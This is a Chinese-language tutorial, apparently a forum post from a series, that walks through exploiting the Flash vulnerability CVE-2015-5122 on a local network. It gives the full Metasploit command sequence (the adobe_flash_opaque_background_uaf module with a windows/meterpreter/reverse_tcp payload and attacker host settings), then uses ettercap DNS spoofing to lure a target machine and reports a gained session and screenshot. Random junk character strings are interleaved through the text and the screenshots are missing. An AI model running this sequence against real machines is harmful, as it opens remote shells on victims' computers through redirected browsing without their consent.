|
: m# m- Q4 ~7 R. z$ p 二、cve2015-5122漏洞实例演示虚拟机
' d9 g) {8 ^- j5 {& M9 ~
! ^$ Q0 F! ^# l, X% a/ i" A' D
- O+ G8 e* s7 Q) W 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 6 x1 `9 U0 Q! }6 J' W2 L
+ w& {# C/ k; J7 D- t/ G1 J4 t% m& u. g3 {0 V j e
search cve-2015-5122如图:
& j" U: T4 t& P p- G 4 i i/ I& K8 y( s! V- N' v7 n# `
4 p8 T4 m8 d( O1 ]
3 T( Q; X$ n' ?" }1 i
- o/ H" a; q# p" x( d2 t; |( m: M; ~- y: E) l0 e
下面我们敲如下命令:
9 A# w( {1 n8 t, |. A
9 P" \- u. P2 v: B8 D% E* Z; q+ `6 S( Q# k4 j
use exploit/multi/browser/adobe_flash_opaque_background_uaf + C& w% y' G" U9 p
: @% P# P Q7 l0 y& n9 x% D% Y. y {
set PAYLOAD windows/meterpreter/reverse_tcp 0 _/ T! T" p$ x$ ~$ _9 h
- l. s+ B- m4 `; b$ e
7 ?; g3 m# u7 e" } set LHOST 192.168.0.109 1 ^& `5 |6 Q0 X. U
: ?& n% |5 U0 Z4 c
4 E: Y; [' F: L u- Q2 d) C) C2 c set URIPATH / /*根目录*/
" r! f o v, C 1 u/ W% u2 b5 I! I4 n% J
& f, e& b7 I+ P% ]% E' w6 K' a8 b set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 ( q o# R y! O5 |/ b c! M
& _9 D, z# k! q% ^3 A; F- ]- @$ ]+ d# O% T K; u
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 7 @/ E( B6 j# |4 c5 t, F1 `
( `5 V* v( c. C5 T
4 G1 e4 a/ E3 y 然后show options如图:
; P0 C6 h1 }2 i! T6 A$ s # ~: X6 S# p. ]
1 a9 ?7 J9 i/ q
5 N1 R: T6 C5 j9 a5 d. q& M
$ U. ^! Q9 x: N! f; c6 a: K5 a
" d1 c* ?8 K. \+ r& Z6 r
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
" t* v4 E: a. [7 _$ r" a
/ s; ]9 K- t% f" z; {0 u b
& F! d8 H/ D$ A" H, p8 S
0 O' _! W! u" B5 x' f$ O 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
: X# f' d* B; ]7 f3 H
5 h* E( g/ e% [0 |. ^* r
3 Q* P& D% ~1 u$ } Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
$ p& O& S2 | R/ q# k7 y# R
7 j& _: i) n5 j; d
$ V$ g% r' \5 R0 b5 r % J& @. O7 v6 p5 o5 D8 v" r
( M. L+ a& }3 y7 S
: ~' k2 V% \. |2 R1 ` 成功了,这时候我们断开ettercap,如图: * H# s2 h; K' D
& H3 Q* E/ `6 t4 x2 N+ N
$ w3 d2 k. W: P; k& [# i6 `
2 p2 }" h; ]. k E# b
* w k8 A+ U+ `3 q3 E7 M6 n% y3 G) ]
Screenshot如图: : N; ^* `8 N4 H- q$ h
3 @, J1 D2 h) m. K+ r* i
# @( Z- v9 a) @4 Z4 e. b T1 m2 R& Q) H3 N; c" O3 i
: u: A7 g% l0 v# X
% @3 r) `& g/ Y1 N& p + j9 T6 a. o3 L! S4 s0 M. [
|